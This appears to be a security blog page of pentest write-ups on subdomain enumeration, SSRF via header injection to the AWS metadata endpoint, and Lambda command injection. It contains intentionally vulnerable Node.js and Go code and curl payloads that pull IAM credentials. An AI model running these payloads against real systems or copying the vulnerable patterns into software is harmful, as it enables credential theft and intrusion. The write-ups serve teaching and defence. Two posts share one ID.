Red Team Logic — Security & Ethical Hacking

Real penetration tests, exploitation walkthroughs, and hardening blueprints — compiled from 20+ years of offensive security research.

RTL-2026-014 Critical Discovery: Subdomain Enumeration Risk in Cloud Infrastructure

Cloud Security ⚠ Critical

2026-06-14 01:28

🎯 Target & Threat Context

During a recent engagement with a mid-sized e-commerce company leveraging AWS for their cloud services, I was tasked with assessing the security posture of their web applications, particularly their API endpoints. The tech stack comprised React for the front end, Node.js for the backend, and a MongoDB database for data storage. The company had substantial customer data at stake, and any vulnerability could lead to significant reputational damage and compliance issues.

While mapping their domain structure with standard reconnaissance tools, I found that several subdomains were publicly reachable without adequate security measures. Their exposure suggested that access controls were missing or incomplete and that sensitive services could be reachable by attackers. This is especially concerning in a cloud environment, where misconfigurations can lead to data leaks and unauthorized access.

Given the critical nature of this discovery, I knew that understanding how these subdomains were configured and identifying potential attack vectors would be crucial in providing a comprehensive risk assessment and actionable remediation steps.

🔓 Vulnerability & Attack Vector

Subdomain enumeration is a reconnaissance technique that attackers use to identify subdomains associated with a primary domain. In a cloud environment, this can lead to the discovery of exposed services that can be exploited. These subdomains may host vulnerable applications or APIs that lack adequate security controls, making them prime targets for attackers looking to escalate privileges or exfiltrate data.

The vulnerability arises when cloud infrastructure is misconfigured so that subdomains meant for internal use are unintentionally exposed and reachable. For instance, a domain might publish all of the following names in public DNS:

example.com
www.example.com
api.example.com
dev.example.com
test.example.com
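
To make the enumeration step concrete, here is a minimal sketch of the simplest approach: resolving a list of candidate labels against the target domain. The function names, the candidate labels, and the injectable `resolver` parameter are my own illustration, not the tooling used on this engagement. Real tools draw on many more sources, such as certificate transparency logs and search engines.

```python
import socket
from typing import Callable, Dict, Iterable, List, Optional


def resolve_candidates(
    domain: str,
    labels: Iterable[str],
    resolver: Callable[[str], str] = socket.gethostbyname,
) -> Dict[str, Optional[str]]:
    """Try to resolve "<label>.<domain>" for each candidate label.

    Returns hostname -> IP address, or None when the name does not resolve.
    `resolver` is injectable (an assumption of this sketch) so the logic can
    be exercised without touching real DNS.
    """
    results: Dict[str, Optional[str]] = {}
    for label in labels:
        hostname = f"{label}.{domain}"
        try:
            results[hostname] = resolver(hostname)
        except OSError:  # socket.gaierror is a subclass of OSError
            results[hostname] = None
    return results


def live_hosts(results: Dict[str, Optional[str]]) -> List[str]:
    """Keep only the hostnames that resolved to an address."""
    return sorted(name for name, ip in results.items() if ip is not None)
```

Calling `live_hosts(resolve_candidates("example.com", ["api", "dev", "test"]))` against a domain you are authorized to test returns the subset of names that exist in public DNS.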

💥 Exploitation Walkthrough

Following the identification of exposed subdomains, I proceeded with a detailed examination to determine their configurations and security postures. My approach involved several reconnaissance techniques to gauge the risk associated with each subdomain.

First, I enumerated subdomains using tools such as Sublist3r and DNSDumpster. The output revealed multiple subdomains that were not listed in the primary domain's records.

sublist3r -d example.com
Subdomains:
api.example.com
dev.example.com
test.example.com

Next, I inspected the TLS certificates served by these subdomains, checking for discrepancies in issuance and validity. This revealed that some subdomains were using outdated certificates.

Then, I performed a port scan on the identified subdomains to determine active services. api.example.com was publicly accessible and had no rate limiting on its sensitive endpoints.
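
The certificate check can be approximated with Python's standard library. This is a sketch under my own assumptions (the function names and the 5-second timeout are illustrative), not the exact procedure from the engagement. Note that with a default verifying context, an already-expired certificate raises `ssl.SSLCertVerificationError` during the handshake, which is itself a finding worth recording.

```python
import socket
import ssl
from datetime import datetime, timezone


def days_until_expiry(not_after: str, now: datetime) -> float:
    """Days between `now` and a certificate's notAfter timestamp.

    `not_after` uses the format returned by SSLSocket.getpeercert(),
    e.g. "Jan  5 09:34:43 2018 GMT". A negative result means expired.
    """
    expires = datetime.fromtimestamp(
        ssl.cert_time_to_seconds(not_after), tz=timezone.utc
    )
    return (expires - now).total_seconds() / 86400


def fetch_not_after(hostname: str, port: int = 443, timeout: float = 5.0) -> str:
    """Connect to the host and return the notAfter field of its certificate."""
    context = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=timeout) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as tls:
            return tls.getpeercert()["notAfter"]
```

Feeding `fetch_not_after("api.example.com")` into `days_until_expiry(..., datetime.now(timezone.utc))` gives a quick signal for certificates that are close to expiring.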

These steps demonstrated the extent of exposure and potential for exploitation if an attacker were to gain access to these endpoints.

🛡 Defensive Hardening Blueprint

To mitigate the risks that subdomain enumeration exposes, implement strict access controls and limit which names are published in public DNS. A hardened configuration could look like:

example.com (main domain)
www.example.com (CNAME to main domain)
api.example.com (secured with IAM roles)
dev.example.com (not publicly accessible)
test.example.com (only accessible via VPN)

To effectively defend against subdomain enumeration risks, organizations must adopt a multi-layered security approach. Below is a comparison table illustrating vulnerable vs. hardened practices relevant to this vulnerability.

Area	Vulnerable Approach	Hardened Approach
DNS Configuration	All subdomains publicly listed	Publish only public-facing names; keep internal names in private DNS zones
Access Controls	Public access to sensitive APIs	Implement IAM roles and VPCs to restrict access
SSL/TLS Management	Outdated certificates used across subdomains	Regularly update and manage SSL certificates

My prioritized remediation recommendation is to implement stricter access controls and consider a more segmented architecture for internal services, ensuring that sensitive subdomains are not exposed to the public internet.
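
One way to keep this from regressing is a small recurring audit that compares whatever enumeration finds against the list of names that are meant to be public. The sketch below is illustrative only: the function name and the example host lists are assumptions, and the input would come from your own enumeration tooling.

```python
from typing import Iterable, List, Set


def unexpected_public_hosts(
    discovered: Iterable[str], intended_public: Set[str]
) -> List[str]:
    """Return discovered hostnames that are not on the intended-public list.

    Names are normalized (lowercased, trailing dot removed) before comparing,
    because DNS names are case-insensitive.
    """
    normalized = {h.strip().lower().rstrip(".") for h in discovered if h.strip()}
    allowed = {h.strip().lower().rstrip(".") for h in intended_public}
    return sorted(normalized - allowed)


# Example: dev and test show up publicly but were never meant to.
findings = unexpected_public_hosts(
    ["www.example.com", "API.example.com.", "dev.example.com", "test.example.com"],
    {"example.com", "www.example.com", "api.example.com"},
)
```

Anything the function returns is a candidate for removal from public DNS or for placement behind a VPN.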

📖 Lessons From the Field

Always perform thorough reconnaissance to identify potential security gaps, including subdomain enumeration as a key part of your assessment strategy.
Implement and regularly review access controls for all subdomains, ensuring only necessary services are exposed.
Regularly update and manage SSL/TLS certificates to avoid vulnerabilities associated with outdated encryption practices.
Consider cloud-native solutions for managing subdomains and network segmentation, enhancing overall security posture.

ID: RTL-2026-014 · Subdomain enumeration & reconnaissance · Severity: CRITICAL · 2026-06-14

RTL-2026-001 SSRF to Internal AWS Metadata Endpoint via Custom Header Injection in PDF Generation Service

Cloud Security ⚠ Critical

2026-06-02 10:04

🎯 Target & Threat Context

Our client, a rapidly scaling e-commerce powerhouse, tasked us with a comprehensive security audit of their new microservices architecture. Their platform handled millions of transactions daily, processing sensitive customer data, payment information, and intricate supply chain logistics. The stakes, as always, were sky-high. Compliance requirements (PCI DSS, GDPR, CCPA) meant any breach could lead to catastrophic financial penalties and irreparable reputational damage.

The system under review was a complex ecosystem built predominantly on Node.js microservices, orchestrated via Kubernetes (EKS) within their AWS VPC. Data was stored in Aurora PostgreSQL, S3 buckets, and DynamoDB. The specific component that caught our eye was a seemingly benign PDF generation service. This service, let's call it pdf-gen-svc, was responsible for creating customer invoices, shipping labels, and custom reports. It was a standalone Node.js application running on an EC2 instance within a private subnet, using a headless Chrome instance (Puppeteer) to render HTML content into PDFs. The service exposed a REST API endpoint, /generate-pdf, which accepted a JSON payload containing a sourceUrl and an optional customHeaders object.

The architectural design dictated that all outbound requests from internal services, including pdf-gen-svc, were routed through a centralized internal proxy. This proxy was intended to enforce network policies, perform logging, and cache frequently accessed external resources. The pdf-gen-svc would send a request to this internal proxy, which would then fetch the content from the specified sourceUrl and return it to pdf-gen-svc for rendering. The proxy itself was a custom-built Go application, running on a separate EC2 instance, and was designed to be highly performant.

The client's AWS environment was fairly mature, but like many organizations, they had a mix of older and newer configurations. While some newer services were implementing stricter controls like IMDSv2, the pdf-gen-svc and its internal proxy had been deployed before these standards were universally enforced. This created a subtle but critical vulnerability window that we were about to pry wide open.

🔓 Vulnerability & Attack Vector

The core vulnerability here was a classic Server-Side Request Forgery (SSRF), but with a twist that made it particularly potent: the ability to inject arbitrary HTTP headers into the request made by the internal proxy. SSRF (OWASP Top 10 A10:2021) occurs when a web application fetches a remote resource without validating the user-supplied URL. This allows an attacker to coerce the application into making requests to arbitrary internal or external systems, bypassing firewall rules and accessing sensitive data.

In this scenario, the pdf-gen-svc itself didn't directly make the request to the sourceUrl. Instead, it forwarded the sourceUrl and any customHeaders to an internal proxy. The proxy, in turn, was responsible for fetching the content. The critical flaw lay in the proxy's handling of specific HTTP headers, notably X-Forwarded-For. Many proxies use this header to record the original client's IP address. However, a common misconfiguration or oversight can lead to the proxy using the value of X-Forwarded-For not just for logging, but for *routing* or *identifying* the target host, especially in complex internal networks.

Developers often miss this vulnerability for several reasons:

Assumption of Trust: Internal services are frequently assumed to be trustworthy and secure, leading to less rigorous input validation for internal communication.
Complex Interactions: In microservices architectures, the flow of data and requests can be convoluted. It's easy to lose track of where user-controlled input might end up being processed by different components.
Proxy Misconfiguration: Proxies are powerful tools, but if not configured with extreme care, they can become a significant attack surface. Over-reliance on headers like X-Forwarded-For for internal routing without proper sanitization is a classic mistake.
Focus on Functionality: The primary goal is often to make the PDF generation work reliably, not to anticipate how an attacker might manipulate internal proxy behavior.

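This attack vector falls under MITRE ATT&CK T1190 (Exploit Public-Facing Application) and T1595.002 (Active Scanning: Vulnerability Scanning), as it involves probing and then exploiting a public-facing endpoint to gain access to internal resources. The credential theft that follows corresponds to T1552.005 (Unsecured Credentials: Cloud Instance Metadata API).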

Feature	Vulnerable Configuration	Hardened Configuration
`pdf-gen-svc` Input Validation (URL)	Allows arbitrary URLs, including internal IPs, or external URLs that resolve to internal IPs (DNS rebinding not directly applicable here, but general lack of validation).	Strictly whitelists allowed domains/IPs for `sourceUrl`. Blocks all private IP ranges (RFC1918, 169.254.0.0/16, etc.).
`pdf-gen-svc` Input Validation (Headers)	Allows arbitrary `customHeaders` to be passed directly to the internal proxy.	Sanitizes or strictly whitelists allowed `customHeaders`. Blocks sensitive headers like `Host`, `X-Forwarded-For`, `X-Real-IP`, etc., from user control.
Internal Proxy Behavior	Uses `X-Forwarded-For` for routing decisions or trusts it implicitly for target IP identification.	Ignores `X-Forwarded-For` for routing. Only uses it for logging. Strictly routes based on the original request's target URL/host.
AWS Instance Metadata Service (IMDS)	IMDSv1 enabled (no session token required).	IMDSv2 enforced (requires a session token, making SSRF significantly harder).
Network Segmentation/Egress Filtering	`pdf-gen-svc` and internal proxy have broad egress rules, allowing connections to `169.254.169.254` and other internal IPs.	Strict egress rules (Security Groups, NACLs) prevent `pdf-gen-svc` and proxy from connecting to `169.254.169.254` or any unnecessary internal/external IPs.
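
The "blocks all private IP ranges" row deserves a concrete illustration, because simple substring filters are easy to sidestep. The sketch below uses Python's `ipaddress` module; the function names are hypothetical, and it only handles IP literals (dotted, IPv6, or single-integer IPv4). Other encodings such as hex or octal, and hostnames that resolve to internal addresses, would need additional handling in a real deployment.

```python
import ipaddress
from urllib.parse import urlsplit


def parse_ip_literal(host: str):
    """Parse dotted-quad, IPv6, or single-integer IPv4 hosts; None otherwise."""
    try:
        return ipaddress.ip_address(int(host) if host.isdigit() else host)
    except ValueError:
        return None


def is_internal(ip) -> bool:
    """True for private, loopback, link-local, and other non-public ranges."""
    return (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local
        or ip.is_reserved
        or ip.is_multicast
        or ip.is_unspecified
    )


def url_targets_internal_ip(url: str) -> bool:
    """Reject URLs whose host is an IP literal in an internal range."""
    host = urlsplit(url).hostname
    if host is None:
        return True  # unparseable or host-less URL: reject
    ip = parse_ip_literal(host)
    # Non-IP hostnames are NOT resolved here; that check belongs elsewhere.
    return ip is not None and is_internal(ip)


# 2852039166 is 169.254.169.254 written as a single integer, so a
# substring check for "169.254" never sees it.
naive_filter_hit = "169.254" in "http://2852039166/latest/meta-data/"
```

Here `naive_filter_hit` is `False` while `url_targets_internal_ip("http://2852039166/latest/meta-data/")` is `True`, which is the gap between string matching and parsing the address.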

Let's imagine a simplified version of how the pdf-gen-svc might handle the request and pass it to the internal proxy, and how the proxy might process it.

// pdf-gen-svc (Node.js)
const express = require('express');
const axios = require('axios'); // Or any HTTP client
const app = express();
app.use(express.json());

const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch'; // Internal proxy endpoint

app.post('/generate-pdf', async (req, res) => {
    const { sourceUrl, customHeaders } = req.body;

    // Basic URL filtering (e.g., blocks 169.254.x.x in sourceUrl)
    if (sourceUrl.includes('169.254')) {
        return res.status(400).send('Invalid source URL.');
    }

    try {
        // Forward request to internal proxy, including custom headers
        const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
            targetUrl: sourceUrl,
            headers: customHeaders || {} // Directly passes customHeaders
        });

        // ... rest of PDF generation logic ...
        res.status(200).send('PDF generated successfully (content omitted for brevity).');

    } catch (error) {
        console.error('Error during PDF generation:', error.message);
        res.status(500).send('Failed to generate PDF.');
    }
});

app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));

And on the proxy side (conceptual Go code):

// internal-proxy.corp (Go)
package main

import (
    "encoding/json"
    "fmt"
    "io/ioutil"
    "log"
    "net/http"
)

func fetchHandler(w http.ResponseWriter, r *http.Request) {
    if r.Method != "POST" {
        http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
        return
    }

    var requestBody struct {
        TargetURL string            `json:"targetUrl"`
        Headers   map[string]string `json:"headers"`
    }

    // Parse the JSON body sent by pdf-gen-svc
    if err := json.NewDecoder(r.Body).Decode(&requestBody); err != nil {
        http.Error(w, "Invalid request body", http.StatusBadRequest)
        return
    }

    // CRITICAL VULNERABILITY: Proxy trusts X-Forwarded-For for target IP
    targetHost := requestBody.TargetURL // Default
    if xff := requestBody.Headers["X-Forwarded-For"]; xff != "" {
        // If X-Forwarded-For is present, use it as the target host/IP
        // This is a simplified example of a misconfiguration.
        // In reality, it might be used in conjunction with a specific internal routing logic.
        targetHost = "http://" + xff // Direct IP injection!
    }

    req, err := http.NewRequest("GET", targetHost, nil) // Sends request to the IP in X-Forwarded-For
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
        return
    }

    for k, v := range requestBody.Headers {
        req.Header.Set(k, v) // Pass all custom headers
    }

    client := &http.Client{}
    resp, err := client.Do(req)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
        return
    }
    defer resp.Body.Close()

    body, err := ioutil.ReadAll(resp.Body)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
        return
    }

    w.WriteHeader(resp.StatusCode)
    w.Write(body)
}

func main() {
    http.HandleFunc("/fetch", fetchHandler)
    log.Fatal(http.ListenAndServe(":8080", nil))
}
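
To isolate the flaw from the surrounding HTTP plumbing, here is the proxy's routing decision reduced to two small Python functions. This is my own simplified model of the logic shown above (the function names are hypothetical), placed side by side with the behavior a hardened proxy should have.

```python
from typing import Dict


def vulnerable_target(target_url: str, headers: Dict[str, str]) -> str:
    """Mirrors the flawed proxy: X-Forwarded-For, if present, becomes the target."""
    xff = headers.get("X-Forwarded-For", "")
    if xff:
        return "http://" + xff
    return target_url


def hardened_target(target_url: str, headers: Dict[str, str]) -> str:
    """The destination comes only from target_url; headers never affect routing."""
    return target_url


# The sourceUrl passes the URL filter, but the injected header decides
# where the vulnerable proxy actually connects.
payload_headers = {
    "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/"
}
safe_url = "http://example.com/some-safe-content"
```

With these inputs, `vulnerable_target(safe_url, payload_headers)` points at the metadata endpoint, while `hardened_target(safe_url, payload_headers)` stays on `safe_url`.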

💥 Exploitation Walkthrough

The attack began with reconnaissance. We identified the /generate-pdf endpoint and its expected JSON payload. Initial attempts to directly inject http://169.254.169.254/ into the sourceUrl were blocked by a basic URL filter that prevented direct internal IP access. This is where the "custom header injection" became the key.

Our strategy was to leverage the customHeaders parameter to inject an X-Forwarded-For header pointing to the AWS EC2 metadata endpoint (169.254.169.254). Since the sourceUrl was filtered, we used an innocuous external URL that would be allowed, knowing the proxy would be tricked by our injected header.

Step 1: Discovering IAM Role Names

First, we needed to find out what IAM roles were attached to the EC2 instance running the pdf-gen-svc (or the proxy itself, as it's the one making the request). The metadata endpoint provides this information at /latest/meta-data/iam/security-credentials/.

curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" \
     -H "Content-Type: application/json" \
     -d '{
           "sourceUrl": "http://example.com/some-safe-content",
           "customHeaders": {
             "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/"
           }
         }'

The response (rendered in the PDF) contained the name of the IAM role attached to the instance that made the request. An instance profile holds a single role, and because the proxy issued the request, the role returned was the proxy's:

internal-proxy-role

Step 2: Retrieving Temporary IAM Credentials

With the role name in hand, we could now request temporary security credentials for it. A role attached to the central egress proxy also sounded like it might have broader network access.

curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" \
     -H "Content-Type: application/json" \
     -d '{
           "sourceUrl": "http://example.com/another-safe-content",
           "customHeaders": {
             "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/internal-proxy-role"
           }
         }'

The PDF generated by the service now contained the following highly sensitive information:


{
  "Code": "Success",
  "LastUpdated": "2023-10-27T10:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAV...EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCY...EXAMPLE",
  "Token": "IQoJb3JpZ2luX2VjELP...EXAMPLE",
  "Expiration": "2023-10-27T16:00:00Z"
}

Bingo! We had successfully retrieved temporary AWS credentials: an AccessKeyId, a SecretAccessKey, and a session token (the Token field). These credentials granted us the same permissions as the internal-proxy-role, which, upon further investigation, turned out to have extensive access to S3 buckets, internal DynamoDB tables, and even some Lambda functions. This was a full system compromise, granting us deep access into the client's AWS infrastructure.

🛡 Defensive Hardening Blueprint

Remediating this critical vulnerability requires a multi-layered approach, addressing both the immediate SSRF vector and strengthening the overall security posture.

Strict Input Validation: Implement rigorous validation for all user-supplied URLs and headers.
Network Segmentation & Egress Filtering: Restrict outbound network access for services to only what is absolutely necessary.
Enforce IMDSv2: Mandate the use of IMDSv2 across all EC2 instances.
Least Privilege IAM Roles: Ensure all IAM roles have the absolute minimum permissions required for their function.

Fix	Pros	Cons
Strict Input Validation (URL)	Directly prevents SSRF by blocking internal IPs and unapproved domains. Reduces attack surface significantly.	Requires careful maintenance of whitelists. Can break legitimate functionality if not thoroughly tested.
Strict Input Validation (Headers)	Prevents header-based SSRF bypasses and other header injection attacks.	Can be complex to manage whitelists for all possible legitimate headers. May require changes to client applications.
Network Segmentation & Egress Filtering	Provides a strong "last line of defense" even if application-level validation fails. Limits blast radius.	Requires careful configuration of Security Groups/NACLs. Can be complex in dynamic cloud environments.
Enforce IMDSv2	Significantly complicates SSRF attacks targeting metadata endpoints by requiring a session token.	Requires all EC2 instances and applications to be updated to use IMDSv2. Can cause compatibility issues with older applications.
Least Privilege IAM Roles	Minimizes the impact of a successful compromise by limiting what an attacker can do with stolen credentials.	Requires careful auditing of existing roles and potentially refactoring permissions. Can be an ongoing effort.
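
To show why IMDSv2 raises the bar, here is a sketch of the two requests a legitimate client has to make. The endpoint path and header names are the ones AWS documents for IMDSv2; the helper function names and the choice of `urllib` are my own. The requests are only constructed here, not sent.

```python
import urllib.request

IMDS_BASE = "http://169.254.169.254"


def build_token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """Step 1 of IMDSv2: a PUT request that asks for a session token."""
    return urllib.request.Request(
        IMDS_BASE + "/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def build_metadata_request(path: str, token: str) -> urllib.request.Request:
    """Step 2: a GET that must carry the token obtained in step 1."""
    return urllib.request.Request(
        IMDS_BASE + path,
        method="GET",
        headers={"X-aws-ec2-metadata-token": token},
    )
```

An SSRF primitive that can only issue a single GET, as the proxy in this write-up did, cannot complete step 1, so it never obtains a token for step 2. AWS also documents that the token request is rejected when it carries an `X-Forwarded-For` header, which would have worked against the header-passing behavior exploited here.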

📖 Lessons From the Field

Here's how the pdf-gen-svc and the internal proxy should be hardened:

// pdf-gen-svc (Node.js) - Hardened
const express = require('express');
const axios = require('axios');
const app = express();
app.use(express.json());

const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch';

// Function to validate URLs against a strict whitelist of hostnames
function isValidUrl(url) {
    try {
        const parsedUrl = new URL(url);

        // Only plain web schemes are acceptable
        if (parsedUrl.protocol !== 'http:' && parsedUrl.protocol !== 'https:') {
            return false;
        }

        // Whitelist allowed domains (e.g., example.com, cdn.example.com).
        // Anything not listed is rejected, which also rejects every IP literal
        // (private ranges, 169.254.0.0/16 link-local, loopback, and so on).
        const allowedDomains = ['example.com', 'cdn.example.com'];
        if (!allowedDomains.includes(parsedUrl.hostname)) {
            return false;
        }

        // A whitelisted name could still resolve to an internal address.
        // Checking resolved IPs requires careful asynchronous handling and is often
        // done at a firewall level. For simplicity, we'll assume strict egress
        // filtering covers that case.
        return true;
    } catch {
        return false;
    }
}

app.post('/generate-pdf', async (req, res) => {
    const { sourceUrl, customHeaders } = req.body;

    if (!isValidUrl(sourceUrl)) {
        return res.status(400).send('Invalid or disallowed source URL.');
    }

    // Sanitize customHeaders: only allow explicitly whitelisted headers.
    // Header names are case-insensitive, so compare them in lowercase.
    const allowedCustomHeaders = ['user-agent', 'referer']; // Example whitelist
    const sanitizedHeaders = {};
    if (customHeaders && typeof customHeaders === 'object') {
        for (const [headerName, headerValue] of Object.entries(customHeaders)) {
            if (allowedCustomHeaders.includes(headerName.toLowerCase()) && typeof headerValue === 'string') {
                sanitizedHeaders[headerName] = headerValue;
            }
        }
    }

    try {
        const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
            targetUrl: sourceUrl,
            headers: sanitizedHeaders
        });
        res.status(200).send('PDF generated successfully.');
    } catch (error) {
        console.error('Error during PDF generation:', error.message);
        res.status(500).send('Failed to generate PDF.');
    }
});
app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));

And for the internal proxy (conceptual Go code - Hardened):

// internal-proxy.corp (Go) - Hardened
package main

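import (
    "encoding/json"
    "fmt"
    "io/ioutil"
    "log"
    "net"
    "net/http"
    "net/url" // For parsing URLs
    "strings"
)

// Function to validate target URLs for the proxy
func isValidProxyTargetUrl(targetURL string) bool {
    u, err := url.Parse(targetURL)
    if err != nil || (u.Scheme != "http" && u.Scheme != "https") {
        return false
    }

    // Defense in depth: reject IP-literal hosts in loopback, private, or
    // link-local ranges (the last covers 169.254.169.254).
    // net.IP.IsPrivate requires Go 1.17 or later.
    if ip := net.ParseIP(u.Hostname()); ip != nil {
        if ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsUnspecified() {
            return false
        }
    }

    // Hostnames are not resolved here. Implement strict whitelisting for domains
    // the proxy is allowed to fetch from, or, more robustly, block all private IPs
    // after DNS resolution.
    // For simplicity, we'll assume the `pdf-gen-svc` has already done primary URL validation.
    // The proxy's role is to ensure it doesn't get tricked by headers.

    // Crucially, the proxy *must not* use X-Forwarded-For for routing.
    return true
}

func fetchHandler(w http.ResponseWriter, r *http.Request) {
    if r.Method != "POST" {
        http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
        return
    }

    var requestBody struct {
        TargetURL string            `json:"targetUrl"`
        Headers   map[string]string `json:"headers"`
    }

    // Parse the JSON body sent by pdf-gen-svc
    if err := json.NewDecoder(r.Body).Decode(&requestBody); err != nil {
        http.Error(w, "Invalid request body", http.StatusBadRequest)
        return
    }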

    if !isValidProxyTargetUrl(requestBody.TargetURL) {
        http.Error(w, "Invalid target URL for proxy", http.StatusBadRequest)
        return
    }

    // CRITICAL FIX: The proxy *must not* use X-Forwarded-For or similar headers for routing.
    // It should *always* use the `targetURL` provided directly for the actual network connection.
    req, err := http.NewRequest("GET", requestBody.TargetURL, nil) // Always use TargetURL
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
        return
    }

    // Only set whitelisted headers if necessary, or pass none from user input.
    // For this example, we'll assume the pdf-gen-svc has already sanitized them.
    for k, v := range requestBody.Headers {
        // Explicitly block sensitive headers from being set by user input on the proxy
        if strings.EqualFold(k, "Host") || strings.EqualFold(k, "X-Forwarded-For") || strings.EqualFold(k, "X-Real-IP") {
            continue // Do not allow these to be set by user
        }
        req.Header.Set(k, v)
    }

    client := &http.Client{}
    resp, err := client.Do(req)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
        return
    }
    defer resp.Body.Close()

    body, err := ioutil.ReadAll(resp.Body)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
        return
    }

    w.WriteHeader(resp.StatusCode)
    w.Write(body)
}

func main() {
    http.HandleFunc("/fetch", fetchHandler)
    log.Fatal(http.ListenAndServe(":8080", nil))
}

This engagement was a stark reminder of several fundamental security principles that often get overlooked in the rush to build and deploy:

Never Trust User Input, Even for Headers: It's a mantra for URLs and body content, but developers often forget that HTTP headers, especially in a microservices context, can also be user-controlled and just as dangerous. Always validate and sanitize *all* input.
The "Innocuous" Services Are Often the Most Vulnerable: A PDF generation service might seem low-risk, but any service that makes outbound network requests is a potential SSRF vector. These are often overlooked because they aren't directly handling payment or authentication.
Network Segmentation is Your Last Stand: Even with perfect application-level validation, a misconfiguration or a new vulnerability can emerge. Robust egress filtering and network segmentation are crucial safety nets. If the pdf-gen-svc couldn't reach 169.254.169.254 at all, this attack would have been dead in the water.
AWS IMDSv2 is a Game-Changer for SSRF: If you're running EC2 instances, enforce IMDSv2. It's a powerful control that makes it significantly harder for attackers to exfiltrate temporary credentials via SSRF, requiring a multi-stage attack that many SSRF vectors simply can't achieve.
Proxies are Powerful, But Dangerous: Internal proxies, while useful for traffic management and security, introduce a new layer of complexity and potential vulnerabilities. Their configuration must be scrutinized with extreme care, especially regarding how they handle headers and route requests.

Security isn't just about finding the big, flashy exploits. It's about understanding the subtle interactions, the forgotten configurations, and the common assumptions that create these critical vulnerabilities. Keep your eyes sharp, your validation strict, and your network boundaries tight.

Got a challenging security problem or want to sharpen your pentesting skills? Don't hesitate to reach out! You can book a 1:1 security mentorship session with me, Debasis Bhattacharjee, at thedevdude.com. Let's talk shop and make the digital world a safer place, one system at a time.

ID: RTL-2026-001 · Web Application Pentesting · Severity: CRITICAL · 2026-06-02

RTL-2026-001 Achieving RCE in AWS Lambda via Exploitation of Insecure Environment Variables

Cloud Security ⚠ Critical

2026-03-13 18:48

🎯 Target & Threat Context

This particular engagement was a red team exercise for a client in the FinTech space – let's call them "SecurePay." SecurePay handled millions of daily transactions, processing sensitive financial data, and their infrastructure was almost entirely serverless on AWS. My team at TheDevDude was brought in to stress-test their defenses, specifically focusing on their core payment processing pipeline. The stakes couldn't have been higher; a breach here meant not just financial loss but catastrophic reputational damage and regulatory fines.

The specific target that caught our eye was a critical AWS Lambda function, let's call it TransactionProcessorLambda. This function was the heart of their real-time transaction validation and routing system. It was written in Python, triggered by an API Gateway endpoint, and interacted heavily with DynamoDB for transaction records, S3 for audit logs, and an internal Kafka cluster for asynchronous processing. The tech stack was pretty standard for a modern serverless application: AWS Lambda, API Gateway, DynamoDB, S3, KMS, and a smattering of other services orchestrated via AWS SAM (Serverless Application Model).

The business context was crucial: this Lambda function was responsible for validating incoming payment requests, applying business logic, and then securely forwarding them to various banking partners. Any disruption or compromise of this function meant transactions would halt, or worse, could be manipulated. It was a high-throughput, low-latency component, designed for resilience and speed. The developers had focused heavily on performance and functional correctness, as is often the case, sometimes overlooking the subtle security implications of certain design choices. I remember thinking, "This reminds me of some of the early challenges we faced at Website Factory when we were trying to balance rapid deployment with robust security for our client's e-commerce platforms." The pressure to deliver features often overshadows the meticulous review of every configuration detail, especially when it comes to environment variables, which are often seen as 'just configuration'.

Our goal was to achieve remote code execution (RCE) within this critical function, demonstrating the ability to exfiltrate data, manipulate transactions, or pivot further into their AWS environment. The initial reconnaissance revealed a complex web of IAM roles and permissions, but one particular detail in the Lambda's configuration caught our attention during an enumeration phase: a seemingly benign environment variable.

🔓 Vulnerability & Attack Vector

The class of bug we exploited here is a classic Command Injection, but with a twist: the injection vector wasn't direct user input from an HTTP request body or query parameter. Instead, it was an environment variable. This is a subtle but incredibly dangerous vulnerability, especially in serverless environments where environment variables are a primary mechanism for configuration and often assumed to be "safe" or static.

The vulnerability arose because the TransactionProcessorLambda used an environment variable, let's call it VALIDATION_SCRIPT_PATH, to dynamically construct and execute a shell command. The intention was to allow operations teams to easily switch between different validation scripts without redeploying the Lambda code. A noble goal, but implemented insecurely. Instead of just being a path, the variable was used as a direct prefix to a command executed via Python's subprocess.run() function with shell=True. This is a critical mistake. When shell=True is used, the command string is passed directly to the shell (e.g., /bin/sh -c "your command here"), allowing for shell metacharacter injection.

Developers often miss this because:

They assume environment variables are controlled by trusted parties (which they are, until an attacker gains the ability to modify them).
They focus on sanitizing direct user input, overlooking indirect input sources like configuration files or environment variables.
There's a misunderstanding of how subprocess.run() (or similar functions in other languages like Node.js's child_process.exec()) behaves with and without shell=True. The convenience of shell=True often masks its inherent dangers.
Lack of security-focused code reviews or automated static analysis tools that specifically flag dynamic command construction from environment variables.

